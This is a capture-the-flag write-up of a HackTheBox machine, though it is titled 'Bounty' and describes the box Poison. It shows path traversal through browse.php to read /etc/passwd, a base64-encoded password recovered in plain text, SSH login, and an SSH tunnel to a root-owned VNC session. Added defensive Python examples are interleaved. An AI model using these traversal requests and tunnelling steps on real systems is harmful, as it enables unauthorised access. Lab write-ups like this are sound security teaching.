Bounty - Hackthebox.eu

Great box over at hackthebox.eu, which taught me a nifty new trick. Let's get started!

Enumeration

As always, we start with a full nmap scan:

sudo nmap -sV -sC -oA initial -p- 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 413.45 seconds

So we have port 80 running an HTTP service and port 22 running SSH.

Browsing to the web page displays the following:

We can run the following scripts. Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

info.php reveals the following:

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:

Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )

That sounds like an interesting file. First, let's see what happens when we change the parameter after the file= part:

http://10.10.10.84/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

So our user is probably charix.
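browse.php takes a file= parameter and hands it straight to the filesystem, which is why both /etc/passwd and pwdbackup.txt come back. The Python below is an added example, not the box's PHP and not code from this write-up: it shows the two checks such a script should have applied, an allowlist of the pages the front page actually offers and a containment check that the resolved path stays under the web root. The web root path is an assumed placeholder, and the request values are constructed from what the write-up shows.

```python
import posixpath

# Assumed web root of the vulnerable application (placeholder, not taken from the box).
WEB_ROOT = "/usr/local/www/apache24/data"

# The only pages the front page offers; nothing else has any business being served.
ALLOWED_PAGES = {"ini.php", "info.php", "listfiles.php", "phpinfo.php"}


def resolve_under(base, requested):
    """Return the normalised absolute path of `requested` if it stays inside `base`.

    Returns None for empty input, NUL bytes, absolute paths and any '..'
    sequence that climbs out of the base directory. This is pure string logic
    on POSIX paths; a real handler should additionally run os.path.realpath on
    the result so a symlink inside the web root cannot point back out of it.
    """
    if not requested or "\x00" in requested:
        return None
    base = posixpath.normpath(base)
    # posixpath.join discards `base` when `requested` is absolute, which is
    # exactly why "/etc/passwd" fails the containment check below.
    candidate = posixpath.normpath(posixpath.join(base, requested))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def pick_page(file_param):
    """Strict policy: serve only a name from the allowlist, resolved under WEB_ROOT.

    The allowlist is the real fix; the containment check is defence in depth
    in case the list is later extended with a name that contains separators.
    """
    if file_param not in ALLOWED_PAGES:
        return None
    return resolve_under(WEB_ROOT, file_param)


def classify(file_param):
    """Label a file= value the way a code reviewer or a WAF rule would.

    Returns "allowed", "traversal" (escapes the web root) or "not-listed"
    (inside the web root, but not a page the application offers).
    """
    if resolve_under(WEB_ROOT, file_param) is None:
        return "traversal"
    return "allowed" if pick_page(file_param) else "not-listed"


if __name__ == "__main__":
    # Constructed requests mirroring the write-up: an offered page, the backup
    # file disclosed by listfiles.php, and the two /etc/passwd reads.
    for value in ["info.php", "pwdbackup.txt", "/etc/passwd", "../../../etc/passwd"]:
        print(f"file={value!r:28} -> {classify(value)}")
```

The allowlist alone would have stopped every step of this box's foothold; the containment check is there so that a later "just add one more file" change cannot quietly reintroduce traversal.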

Let's see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really..
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

Looking at the way the string is constructed, it looks like base64-encoded data. The hint tells us it is probably encoded 13 times. I used GCHQ's CyberChef to decode it, which gives us the following password:

Charix!2#4%6&8(0
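The nested encoding deserves one extra note: base64 is an encoding, not encryption, so the "secure" password in pwdbackup.txt has no protection at all once the file is readable. The following Python is an added example, not part of the original write-up. It builds a constructed 13-layer blob from a placeholder string (not the real password) and shows how a decoder can peel the layers without counting to 13 by hand, by stopping as soon as the current string no longer looks like base64 or no longer decodes to printable text.

```python
import base64
import binascii
import string

# Constructed stand-in for the secret; the real password from the box is not reproduced here.
PLAINTEXT = "not-the-real-password-example"
LAYERS = 13

B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def wrap_base64(text, layers):
    """Apply base64 `layers` times, the way pwdbackup.txt was produced."""
    data = text.encode("ascii")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


def looks_like_base64(s):
    """Cheap stop condition: base64 alphabet only and a length that is a multiple of 4."""
    return bool(s) and len(s) % 4 == 0 and set(s) <= B64_ALPHABET


def unwrap_base64(blob, max_layers=64):
    """Peel base64 layers until the result no longer decodes to printable text.

    Returns (text, layers_removed). Line-wrapped input (as a text file or
    CyberChef would present it) is compacted first; a plaintext containing
    spaces is left untouched because it never passes looks_like_base64.
    """
    compact = "".join(blob.split())
    current = compact if looks_like_base64(compact) else blob.strip()
    layers = 0
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break  # not a real base64 layer: keep what we have
        if not decoded.isprintable():
            break  # decoded to binary junk, so the previous string was the payload
        current = decoded
        layers += 1
    return current, layers


if __name__ == "__main__":
    blob = wrap_base64(PLAINTEXT, LAYERS)
    text, n = unwrap_base64(blob)
    print(f"removed {n} layers -> {text}")
```

The stop heuristic is deliberately conservative: a short alphanumeric plaintext whose length happens to be a multiple of 4 would get one more decode attempt, and the printable-text check is what catches that case.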

The only other service we've seen so far is SSH.

Exploitation

ssh 10.10.10.84 -l charix

Password: Charix!2#4%6&8(0

And we’re logged in.

Privilege Escalation

After running LinEnum, I noticed that a VNC service is running as root: root runs Xvnc on ports 5901 and 5801, as well as sshd (which I already used to get access to the box). Both VNC ports are bound to 127.0.0.1, so I probably need to set up an SSH tunnel to this machine and use a VNC viewer to get access to the VNC sessions on the Poison host.

I do the following:

charix@Poison:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 713 3 tcp6 *:80 *:*
www httpd 713 4 tcp4 *:80 *:*
www httpd 712 3 tcp6 *:80 *:*
www httpd 712 4 tcp4 *:80 *:*
www httpd 711 3 tcp6 *:80 *:*
www httpd 711 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
www httpd 641 3 tcp6 *:80 *:*
www httpd 641 4 tcp4 *:80 *:*
www httpd 640 3 tcp6 *:80 *:*
www httpd 640 4 tcp4 *:80 *:*
www httpd 639 3 tcp6 *:80 *:*
www httpd 639 4 tcp4 *:80 *:*
www httpd 638 3 tcp6 *:80 *:*
www httpd 638 4 tcp4 *:80 *:*
www httpd 637 3 tcp6 *:80 *:*
www httpd 637 4 tcp4 *:80 *:*
root httpd 625 3 tcp6 *:80 *:*
root httpd 625 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe
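The sockstat output is the whole privilege-escalation story: Xvnc runs as root but is bound to 127.0.0.1, which only keeps it off the network, not away from anyone who already has a shell on the host. As an added example that is not part of the write-up, the Python below parses a constructed excerpt of sockstat -l output in the same column layout as above and reports which root-owned listeners are loopback-only, the ones an auditor should treat as reachable by any local user through an SSH port forward. The sample text is constructed from lines in the output above; the column handling assumes the FreeBSD sockstat format shown there.

```python
from collections import defaultdict

# Constructed excerpt in the format of FreeBSD `sockstat -l`, taken from the listing above.
SAMPLE = """\
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 713 3 tcp6 *:80 *:*
www httpd 713 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
root httpd 625 3 tcp6 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 6 udp6 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
"""

LOOPBACK = {"127.0.0.1", "::1"}


def parse_sockstat(text):
    """Yield one dict per TCP/UDP listener line; unix-domain sockets are skipped."""
    for line in text.strip().splitlines()[1:]:  # first line is the column header
        parts = line.split()
        if len(parts) < 7:
            continue  # stream/seqpacket sockets have no foreign-address column
        user, command, pid, _fd, proto, local, _foreign = parts[:7]
        if not proto.startswith(("tcp", "udp")):
            continue
        host, _, port = local.rpartition(":")
        yield {"user": user, "command": command, "pid": int(pid),
               "proto": proto, "host": host.strip("[]"), "port": int(port)}


def root_listeners(text):
    """Group root-owned listeners by command and record whether any binding leaves loopback."""
    by_cmd = defaultdict(lambda: {"ports": set(), "exposed": False})
    for sock in parse_sockstat(text):
        if sock["user"] != "root":
            continue
        entry = by_cmd[sock["command"]]
        entry["ports"].add(sock["port"])
        if sock["host"] not in LOOPBACK:
            entry["exposed"] = True  # wildcard or external address: reachable over the network
    return dict(by_cmd)


def findings(text):
    """Audit lines: loopback-only root services are still reachable by local users via ssh -L."""
    notes = []
    for command, entry in sorted(root_listeners(text).items()):
        scope = ("network-exposed" if entry["exposed"]
                 else "loopback only (reachable by local users, e.g. through an SSH tunnel)")
        notes.append(f"{command}: ports {sorted(entry['ports'])}, {scope}")
    return notes


if __name__ == "__main__":
    for note in findings(SAMPLE):
        print(note)
```

Run against the real output, the report puts Xvnc (5801, 5901) and sendmail (25) in the loopback-only bucket; the question a defender should then ask is whether a root-owned desktop session needs to exist at all, and if so why its password lives in a file a low-privilege user can read.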

I used  http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html  and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.

There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:

ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84

Using vncviewer (with secret as the password file), we can get access to the root user's desktop, which contains the key:

vncviewer -passwd secret

Use localhost:5901 as the target to get access.